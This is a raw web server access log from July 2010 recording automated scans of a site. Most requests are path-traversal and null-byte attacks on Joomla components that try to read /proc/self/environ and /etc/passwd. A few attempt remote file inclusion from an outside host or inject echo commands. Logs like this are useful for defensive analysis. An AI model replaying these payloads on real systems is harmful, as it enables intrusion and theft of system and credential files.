193.43.92.192 - - [26/Jul/2010:21:21:09 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
94.23.8.200 - - [26/Jul/2010:21:21:29 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
81.93.240.46 - - [26/Jul/2010:21:21:31 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:21:31 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:23:49 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:23:49 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:23:49 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:21:25:17 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:21:25:18 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:25:18 +0200] "GET /logs/access_log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
94.23.8.200 - - [26/Jul/2010:21:25:18 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:21:25:18 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
81.93.240.46 - - [26/Jul/2010:21:25:18 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
94.23.8.200 - - [26/Jul/2010:21:25:18 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.803"
81.93.240.46 - - [26/Jul/2010:21:25:18 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:21:25:18 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.805"
207.46.199.200 - - [26/Jul/2010:21:26:10 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.97.16.122 - - [26/Jul/2010:21:29:40 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
76.97.16.122 - - [26/Jul/2010:21:30:29 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
119.192.145.144 - - [26/Jul/2010:21:37:24 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
211.202.2.34 - - [26/Jul/2010:21:37:39 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:21:37:40 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
119.192.145.144 - - [26/Jul/2010:21:38:16 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:38:51 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:38:51 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:38:52 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
119.192.145.144 - - [26/Jul/2010:21:42:45 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:21:45:04 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:45:05 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:45:05 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:45:23 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:45:23 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:45:24 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
207.46.199.182 - - [26/Jul/2010:21:49:11 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.192.145.144 - - [26/Jul/2010:22:02:17 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:02:18 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:02:18 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:05:45 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:05:46 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:05:46 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.122.49.95 - - [26/Jul/2010:22:06:28 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
119.192.145.144 - - [26/Jul/2010:22:07:19 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:07:20 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:22:07:20 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
208.80.193.121 - - [26/Jul/2010:22:20:55 +0200] "GET / HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {582FE295-7F39-915C-5953-A2B4DE3C09A0}; .NET CLR 1.1.4322)"
67.228.55.28 - - [26/Jul/2010:22:23:23 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.228.55.28 - - [26/Jul/2010:22:23:41 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
38.108.124.28 - - [26/Jul/2010:22:26:10 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:26:26 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:26:51 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:27:05 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:27:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
222.122.49.95 - - [26/Jul/2010:22:29:42 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
222.122.49.95 - - [26/Jul/2010:22:29:43 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
222.122.49.95 - - [26/Jul/2010:22:29:44 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
62.149.171.147 - - [26/Jul/2010:22:34:53 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
67.195.112.43 - - [26/Jul/2010:22:35:22 +0200] "GET /?C=M;O=A HTTP/1.0" 200 560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.171.147 - - [26/Jul/2010:22:35:27 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:35:29 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:35:33 +0200] "GET /logs//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:37:08 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:38:59 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:39:09 +0200] "GET //index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:41:43 +0200] "GET /logs/access_log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:41:43 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:41:43 +0200] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:41:57 +0200] "GET /logs/access_log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:41:57 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:41:57 +0200] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
38.108.124.28 - - [26/Jul/2010:22:42:18 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:42:18 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:22:42:18 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.169.23.182 - - [26/Jul/2010:22:42:41 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:42:41 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:42:42 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:42:44 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:42:44 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
83.169.23.182 - - [26/Jul/2010:22:42:45 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
62.149.171.147 - - [26/Jul/2010:22:44:14 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:16 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:17 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:44:57 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:47:27 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:47:28 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:47:30 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:48:45 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:01 +0200] "GET /logs/access_log//index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:03 +0200] "GET //index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:04 +0200] "GET /logs//index2.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:50 +0200] "GET /logs/access_log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:51 +0200] "GET //index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:49:53 +0200] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:51:06 +0200] "GET /logs/access_log//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:51:08 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:51:09 +0200] "GET /logs//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:53:47 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:55:42 +0200] "GET /logs/access_log//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:55:43 +0200] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:55:45 +0200] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:22:56:54 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:57:50 +0200] "GET /logs/access_log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:57:51 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:57:53 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.149.171.147 - - [26/Jul/2010:22:58:56 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:22:58:57 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:22:58:59 +0200] "GET //index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:22:59:00 +0200] "GET /logs//index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
80.89.233.48 - - [26/Jul/2010:23:00:42 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
